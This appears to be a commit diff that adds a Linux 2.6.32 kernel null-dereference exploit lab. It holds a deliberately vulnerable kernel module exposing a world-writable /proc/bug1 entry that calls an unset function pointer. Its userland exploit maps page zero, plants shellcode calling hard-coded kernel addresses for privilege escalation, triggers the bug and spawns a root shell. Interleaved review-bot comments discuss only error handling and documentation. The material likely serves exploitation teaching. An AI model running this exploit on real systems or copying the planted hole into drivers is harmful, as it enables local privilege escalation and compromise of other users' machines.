Commit 3567173

committed
add null_dereference
1 parent b91726d commit 3567173


4 files changed

+60
-0
lines changed

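--- a/null_exp/Makefile
+++ b/null_exp/Makefile
@@ -0,0 +1,9 @@
+obj-m := null.o
+KERNELDIR := /lib/modules/2.6.32.21/build
+PWD := $(shell pwd)
+modules:
+$(MAKE) -C $(KERNELDIR) M=$(PWD) modules
+modules_install:
+$(MAKE) -C $(KERNELDIR) M=$(PWD) modules_install
+clean:
+rm -rf *.o *~ core .depend .*.cmd *.ko *.mod.c .tmp_versions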

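--- a/null_exp/null.c
+++ b/null_exp/null.c
@@ -0,0 +1,27 @@
+#include <linux/init.h>
+#include <linux/module.h>
+#include <linux/kernel.h>
+#include <linux/proc_fs.h>
+
+void (*my_funptr)(void);
+
+int bug1_write(struct file *file, const char *buf, unsigned long len)
+{
+my_funptr();
+return len;
+}
+
+static int init_func(void)
+{
+printk(KERN_ALERT "null_dereference driver init!\n");
+create_proc_entry("bug1", 0666, 0)->write_proc = bug1_write;
+return 0;
+}
+
+static void exit_func(void)
+{
+printk(KERN_ALERT "null_dereference driver exit\n");
+}
+
+module_init(init_func);
+module_exit(exit_func);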
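Review bot: `bug1_write` calls `my_funptr` unconditionally, but nothing in this file ever assigns it, so any write to `/proc/bug1` (created with mode 0666, i.e. writable by every local user) makes the kernel branch to address 0. If that is the intended training bug, a comment above `my_funptr` should say so; otherwise guard the call with `if (!my_funptr) return -EINVAL;`. Separately, `init_func` dereferences the result of `create_proc_entry` without a NULL check, and `exit_func` never calls `remove_proc_entry("bug1", NULL);`, so after unload the entry would still reference the module's handler. The handler also takes three parameters, whereas the 2.6-era `write_proc` callback type has a fourth, `void *data`.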

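--- a/null_exp/null_exp.c
+++ b/null_exp/null_exp.c
@@ -0,0 +1,20 @@
+#include <sys/types.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <sys/mman.h>
+
+char payload[] = "\x31\xc0\xe8\xe9\xb2\x16\xc0\xe8\xa4\xaf\x16\xc0\xc3";
+
+int main()
+{
+mmap(0, 4096, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS , -1, 0);
+memcpy(0, payload, sizeof(payload));
+
+int fd = open("/proc/bug1", O_WRONLY);
+write(fd, "foo", 3);
+system("/bin/sh");
+return 0;
+}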
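Review bot: The results of `mmap`, `open` and `write` in `main` are all discarded, so every failure is silent. The fixed mapping at address 0 is exactly what a non-zero `vm.mmap_min_addr` refuses, and on such a system the following `memcpy(0, …)` simply faults in user space; compare the result with `MAP_FAILED` and bail out, e.g. `if (p == MAP_FAILED) { perror("mmap"); return 1; }`. `write` is used without `<unistd.h>`, and a header comment should record that the demo depends on page 0 being mappable and on the absolute addresses embedded in `payload`.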

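--- a/null_exp/sc.s
+++ b/null_exp/sc.s
@@ -0,0 +1,4 @@
+xor %eax,%eax
+call 0xc016b2f0
+call 0xc016afb0
+ret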
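Review bot: The two `call` targets are bare absolute addresses with no comment saying what they refer to or which kernel image they were taken from. They are presumably tied to the single build named by `KERNELDIR` in the Makefile and would be meaningless on any other image. A header comment such as `# absolute addresses below are specific to one kernel build; see KERNELDIR in the Makefile` would document that dependency. The file should also note that `payload` in `null_exp.c` embeds these same addresses, so the two cannot drift apart unnoticed.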
